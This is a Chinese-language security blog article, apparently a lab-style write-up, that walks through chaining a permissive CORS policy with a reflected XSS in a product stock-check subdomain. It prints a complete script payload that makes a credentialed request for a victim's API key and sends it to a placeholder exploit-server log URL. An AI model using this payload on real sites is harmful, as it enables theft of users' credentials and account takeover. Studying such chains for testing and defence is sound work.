单看都是中低危,组合起来却拿下严重漏洞?赏金猎人都在练的CORS+反射XSS组合拳

admin 2026-06-30 07:21:57 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文详细分析了CORS配置不当与反射型XSS组合利用的漏洞链。通过BurpSuite检测到目标站点存在允许任意子域携带凭证的CORS策略,结合商品页面的反射型XSS漏洞,构造恶意脚本窃取用户API密钥。文章提供完整的漏洞利用代码和测试流程,强调中低危漏洞组合可形成严重权限泄露风险。 综合评分: 85 文章分类: WEB安全,漏洞分析,实战经验,渗透测试,红队


cover_image

单看都是中低危,组合起来却拿下严重漏洞?赏金猎人都在练的CORS+反射XSS组合拳

原创

升斗安全XiuXiu 升斗安全XiuXiu

升斗安全

2026年6月28日 00:08 广东

在小说阅读器读本章

去阅读

【文章说明】

  • 目的:本文内容仅为网络安全技术研究与教育目的而创作。
  • 红线:严禁将本文知识用于任何未授权的非法活动。使用者必须遵守《网络安全法》等相关法律。
  • 责任:任何对本文技术的滥用所引发的后果自负,与本公众号及作者无关。
  • 免责:内容仅供参考,作者不对其准确性、完整性作任何担保。

阅读即代表您同意以上条款。

在挖洞的时候,我们经常会遇到一些看似不起眼的配置,组合起来却能把人送进后台。今天要聊的这个场景,正好能把Burp Suite配合CORS配置不当和一个小小的XSS,玩出花儿来。

故事的开头很常规:打开Burp内置浏览器,正常登录你的账户页面,随便逛逛。这时候别光用眼睛看,切到HTTP历史记录里翻一翻。你会发现,有个请求悄悄发到了/accountDetails,返回的响应里赫然躺着你的API密钥。更重要的是,响应头里带着Access-Control-Allow-Credentials: true,这基本就是在喊:“我支持跨域携带凭证,就看谁有本事来拿。”

好,线索有了,我们开始试探。把这个请求直接扔进Burp Repeater,在请求头里手动加上一行:

Origin: http://target.com(把target.com换成你目标地址的域名)。点发送,看响应。如果响应头里原样返回了一个Access-Control-Allow-Origin: http://subdomain.lab-id,那就稳了。这说明目标站点的CORS策略相当“大方”,大方到允许任意子域名的请求,而且连HTTP这种明文协议都不嫌弃。

接下来,我们换个地方转转。随便打开一个商品页面,点那个“检查库存”的按钮。盯住Burp里的请求,你会发现这个检查库存的功能,正好是通过一个子域名发起的HTTP请求。更妙的是,请求里的productId参数,竟然对输入的内容照单全收,直接反射到页面上。一个经典的反射型XSS漏洞,就这么送到了嘴边。

到这里,单点问题都齐了:

  • 一个允许携带凭证的CORS
  • 一个可以跨域偷数据的接口
  • 还有一个能执行脚本的XSS

现在只需要把它们串起来,写成一份钓鱼大餐。

打开你的漏洞利用服务器,把下面这套精心烹制的HTML摆上去。记住,把你的目的地址域名和漏洞利用服务器地址填到对应的坑里:

<script>&nbsp; &nbsp;&nbsp;document.location="http://stock.YOUR-target.com/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-target.com/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.com.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"</script>

这段代码的思路其实很直白:受害者一访问我们的恶意页面,浏览器就会跳转到那个存在XSS的库存检查子域名。URL里夹带的脚本一旦在受害者浏览器里跑起来,就会悄悄发送一个带凭证的请求,把/accountDetails接口返回的API密钥,打包发送到我们的漏洞利用服务器日志里。

我们自己先点“查看漏洞利用”试试水。如果一切顺利,页面会跳转到日志界面,你的API密钥会明晃晃地挂在URL参数里。测试通过,点击“向受害者交付漏洞利用”,等着模拟受害者上钩就行。最后去“访问日志”里,从URL参数中轻松捞出受害者的API密钥,提交,收工。

这种攻击链在实际的赏金猎人生涯中其实很有参考价值。CORS配置不严、HTTP子域名、反射XSS,单独看可能都只能算中低危,但组合拳打出来,往往就是直接拿账号权限的严重漏洞。多留意这些细节,说不定下个高额赏金就在这种组合拳里。

如果觉得这期分享对你有帮助,别忘了点赞、关注,顺手转发给一起挖洞的兄弟们。也欢迎大家点个推荐,让更多人看到这种实用的漏洞组合思路。我们下期再见!

往期推荐:

别只看书了!CTF免费资源+在线靶场福利,这才是赏金猎人的训练营

免费打造你的渗透测试 AI助手:Burpsuite+Ollama+本地大模型 → AI辅助分析,赏金猎人高效挖洞(脚本已打包)


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:升斗安全 升斗安全XiuXiu 升斗安全XiuXiu《单看都是中低危,组合起来却拿下严重漏洞?赏金猎人都在练的CORS+反射XSS组合拳》

评论:0   参与:  0